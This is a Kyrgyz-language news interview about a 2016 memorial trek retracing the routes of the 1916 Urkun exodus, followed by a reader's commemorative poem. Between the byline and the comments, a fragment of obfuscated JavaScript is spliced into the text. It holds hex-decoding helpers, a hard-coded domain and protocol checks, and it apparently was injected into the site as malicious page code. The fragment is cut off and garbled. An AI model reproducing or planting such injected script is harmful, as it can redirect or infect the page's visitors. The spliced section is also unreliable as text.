“ЖҮРҮШТҮ ҮРКҮН ШЕЙИТТЕРИНЕ АРНАДЫК”

12661848_1695051347407145_15243113789657923_nАзамат ЖАНАЛИЕВ, «Улуу кыргыз изи» долбоорунун ээси, саякатчы

Быйыл 2016-жыл эгемен Кыргызстандын тарыхында эң маанилүү жылдардан болуп жаткандагы белгилүү. Ушул жыл кыргыздардын тарыхый тагдырын элдин эсине салып, келечекке карай ишенимдүү жана эрктүү кадам таштоого себеп болуп берерине үмүтүбүз чоң. Бир чоң тарыхый этапты басып өттүк. Эми болсо жаңы мүмкүнчүлүктөрдү карманып, тарыхый эс-тутумубузга таянып, кыргыз мамлекетинин кубаттуулугун арттырууга бардыгыбыз жапа тырмак салым кошууга милдеттүүбүз. Чоң иштерди жасай албасак да, аз ишти, бирок чын дилден аткаруу менен олуттуу аракеттерди көрө турганга ар бирибиздин мүмкүнчүлүгүбүз бар. Бүгүн болсо элге аты чыгып калган жаш саякатчы Азамат мырзанын жаңы долбоору тууралуу тааныштырып кетүүнү туура көрдүк.

– Азамат мырза, сиздин «Улуу кыргыз изи» долбооруңуз былтыркы жылы Кыргызстандын аймагын кыдыруу менен башталды эле, быйыл болсо Үркүндүн 100 жылдыгына карата жүрүш уюштургандын үстүндө иштеп жатыптырсыз…

– Ооба, Үркүн окуясы ар бир кыргыз баласынын жүрөгүнөн өтүп, жүлүнүнө жете турган тарыхый трагедия. Бул – улуттук эс тутумубузда унуткарууга жатпаган окуя деп эсептейм. «Улуу Кыргыз ИЗИ» долбоорунун дагы бир чоң тарыхый  этабы болуп: 1916-жылдагы каргашалуу Үркүн окуясында  курман болгон ата-бабаларыбыздын жаркын элестерине арнап, Кытайды көздөй ар тармактуу жолдорунун бири болгон Барскоон- Бедел ашуусун басып өтүү этабы жакындап келе жатат. Мындай аракет менен биз Үркүн убагында кыргыздар басып өткөн жолдорду кайталап басып өтүп коюу гана эмес, эң биринчи кезекте аларга таазим кылуу, эскерүү жана бүгүнкү күндө Үркүндүн тарыхый маанисин ачып берүүгө салым кошуу башкы максаттардан болуп саналат. Ошондой эле,  Мындан бөлөк,  бабаларыбыз басып өткөн жолдун кыйынчылыгын өз жон терибиз менен сезип көрүү, ошондогу абалды түшүнүү менен эл оозунда калган ар кандай уламыш-чындыктарды иш жүзүнө ашырганга аракет кылып, таш беттерине белги салып, жана экшн стилиндеги видео-тасма жаратуу. Ошондо бул долбоордун алкагында биз Үркүндүн убагындагы кыйынчылыктарды жана татаалдыктарды аз болсо дагы колдон келишинче видео-тасмага түшүрүү менен элге жеткирүүнү көздөп жатабыз.

– Демек, кыргыздардын Кытайга ооп качкан жолун басып өтүү менен Кытайга чейин барууну дагы көздөп жатасызбы?

– Эгер ийгиликтер коштоп Кудай жол берсе, Бедел ашуусунун ары жагындагы Кытай жак өрөөнүндөгү отурукташкан кандаш туугандарыбызга чейин барып келүү максаты бар. Ал жакка Бедел аркылуу эмес, Торугарт чек арасы аркылуу өтүп, автостоп менен ар бир кыргыз айылдарына кирип, жергиликтүү аксакалдардын Үркүн тууралуу эскерүүлөрүн, мүмкүн жеке тарыхын угуп, видео-тасмага жаздырып  келүү жана ошол эле жылдары болгон башка жактагы Кытайга ашып өткөн жолдордогу болгон окуяларды чогултуу да оюубузда. Менимче, бул эки жакта жашап жаткан кыргыздардын ортосундагы маданий-руханий алаканы бекемдейт, анын үстүнө жалпы улуттук трагедия болгон соң. Азыр эки жак менен сүйлөшүүлөрдү жүргүзүп, кандай ыңгайлуу боло тургандыгын карап жатабыз.

– Быйылкы жылдын абдан олуттуу долбоору деп айтсак болчудай экен, айтсаңыз, бул демилгени көтөрүп чыгууга эмне түрткү болду?

– Бул ой 2015-жылы кыргыз жергесин кыдырып келгенден кийин күз айларында жаралган. Демилгени Кыргыз эл баатыры Бексултан Жакиев агай жана тарыхка кайдыгер карабаган кыргыздын мекенчил инсандары колдоп, ой-пикирлерин кошуп жатышууда. Кудайга шүгүр, колдой турган адамдарыбыз жок эмес, ошолордун дем-күчү менен шыктанып, бул сапарга бел байлап турам. Учурда уюштуруу иштери башталды деп айтсам болот. Мына жакында эле, 29-январь күнү долбоордун биринчи жыйыны болуп өттү.   «URKUN 100» этабынын эң биринчи жыйналышынын негизинде маршруттун такталышын жана ишке ашырылышы тууралуу маселелер алдыга коюлган.  Буюрса, 12-февралда жумушчу топтун  жолугушуусунда маршрут жана каржылоо маселеси чечилип калса, дароо жолго чыгаарым анык.  Бул этаптын жыйынтыгында расмий түрдө «UKI 003/URKUN 100-01» маршруту такталып, 2016-тарых жылына карата Үркүн окуясындагы курман болгондор эскерилип, тарых изи жаңыланып, жаңы зыяраттык жана туристтик, тарыхый маршрут түзүлөөрү бышык.

– Азамат мырза, бабаларыбыздын 100 жыл мурунку сууп калган изине кайра жан берип, рухун эскерип, жүгүн жеңилдетип келүүгө аттанып жатканыңыз абдан кубанычтуу, бул демилгени бүтүндөй эл коштоп, батасын берет деп ишенем!

– Рахмат, айтылгандай эле долбоор ата-бабалырыбыздын элесине арналат. Жана кийинки муундардын жүрөгүндө калгыдай кылып эскерүү азыркылардын милдети деп эсептейм. Кудай жол берсе, ошол ашуу жолдордо сөөгү жерге берилбей калгандардын сөөктөрүн чогултуу жана аларды жол жобосу менен жерге берүү иштерин дагы жасайбыз деп турабыз.

Айдар САГЫНБАЕВ

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kok-asaba.journalist.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

One thought on ““ЖҮРҮШТҮ ҮРКҮН ШЕЙИТТЕРИНЕ АРНАДЫК”

  1. апаат …
    бул окуя, бул чындык, бул апаат – тукум курут,
    жүз жыл мурун тээ илгери бизде болуп өткөн.

    акыйкат ачуу айтууга акым бар, жашыра албайм,
    тарыхта болуп өткөн тукум курут бул чындык,
    окко учкан ач кыйкырыгы кулагыма жаңырып,
    түшүмдө да, өңүмдө да кыйнайт мени бул апаат.
    айткын элге, жеткир элге болгонду болгондой деп,
    бей-күнөө шейит кеткен боордоштордун элестери,
    бассам турсам ээрчийт, ээрчип жүрөт алар мени.

    бурмалабай айтып өтөм көкүрөктүн бул дартын,
    билсин ар бир кыргыз, билсин эгер кыргыз болсо,
    билүүгө ал акылуу манкурт эмес, себеби ал кыргыз,
    ата-бабам, кыргызга кыйамат алып келген,
    бул икая, бул чындык, бул апаат – тукум курут,
    жүз жыл мурун тээ илгери кыргызда болуп өткөн.

Комментарий кошуу

Сиздин электрондук почтаңыз жарыяланбайт. Милдеттүү талаалар белгиленген *